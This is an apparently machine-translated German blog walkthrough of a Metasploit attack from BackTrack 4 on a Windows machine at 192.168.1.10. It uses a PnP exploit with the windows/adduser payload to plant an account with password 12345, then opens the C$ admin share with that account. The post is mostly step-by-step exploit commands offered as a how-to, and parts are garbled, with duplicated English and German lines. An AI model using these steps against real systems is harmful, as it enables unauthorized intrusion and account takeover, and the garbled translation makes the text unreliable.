Der Angreifer Computer ist 192.168.1.9 (Linux Backtrack 4)
Der Ziel-Rechner wird 192.168.1.10
zeige Exploits
** show exploits
In diesem Fall wird der Angreifer das
** use ms_035_pnp
Drücken Sie ENTER und das Exploit wird verwendet.
Nun werden wir sehen, was das Exploit kann.
das Exploit wird nun Fragen
** show payloads
Drücken Sie auf ENTER und alle
In diesem Fall wird der Angreifer , einen neuen Benutzer an den Slave-Computer hinzufügen.
Der Befehl, dafür, ist
** set payload windows/adduser
Drücken Sie auf ENTER und das payload wird verwendet werden.
Das nächste, was der Angreifer tun muss, ist das Ziel vorgegeben.
Der Angreifer muss nun mit diesem Befehl die Zielliste anzeigen lassen.
** show targets
Der Befehl, der benutzt werden kann, ist
das Ziel setzen, mit 0
Die Nummer wird dem Slave Betriebssystem zugeordnet.
Die nächsten Schritte werden zeigen, dass die Felder zu füllen durch den Angreifer.
Der nächste Befehl soll die Optionen anzeigen.
Es werden leere Felder sein , die vom Angreifer gefüllt werden müssen.
RHOST steht für Remote Host (Slave-IP-Adresse).
PASS steht für Password.
für beides, sind die Befehle
** set RHOST 192.168.1.10
** set PASS 12345
Der Angreifer setzt auch das Passwort.
Schließlich ist der letzte Befehl, der verwendet werden muss
um das Exploit zu nutzen.
Der Exploit-Befehl das Metasploit aufrufen , um den Angriff auf den Slave zu starten.
Drücken Sie ENTER und Metasploit startet den Angriff.
Nun weiss der Angreifer, dass er ein Konto bei der Slave-Maschine hat.
Konto-Informationen:
username = Metasploit
password = 12345
Nun ist es Zeit für den Angreifer, die Slave Maschine zu benutzen .
Der Angreifer öffnet sich ein Dialogfenster Ausführen.
Im Feld "Ausführen", wird das Ziel eingegeben
** \\192.168.1.10\c$
Angreifer muss den Benutzernamen und das Passwort für die Slave-Maschine eingeben.
In diesem Fall sind Benutzername und Passwort Metasploit und 12345.
What can a slave see on his machine?
If the slave launch a Command Prompt and type in
** net user
The result will be
Was kann ein Sklave auf seiner Maschine zu sehen?
Wenn der Slave startetbekommen Sie eine Eingabeaufforderung, und geben ein.
** net user
Das Ergebnis wird
Der Benutzername "Metasploit" ist da.
Das ist der Benutzername, dass der Angreifer erstellt.
Die Befehle, die ich benutzt habe:
** show exploits
** use EXPLOITNAME
** show payloads
** set payload PAYLOADNAME
** show targets
** set target TARGETNUMBER
** show options
** set RHOST IPADDRESS
** exploit
0 Kommentare:
Kommentar veröffentlichen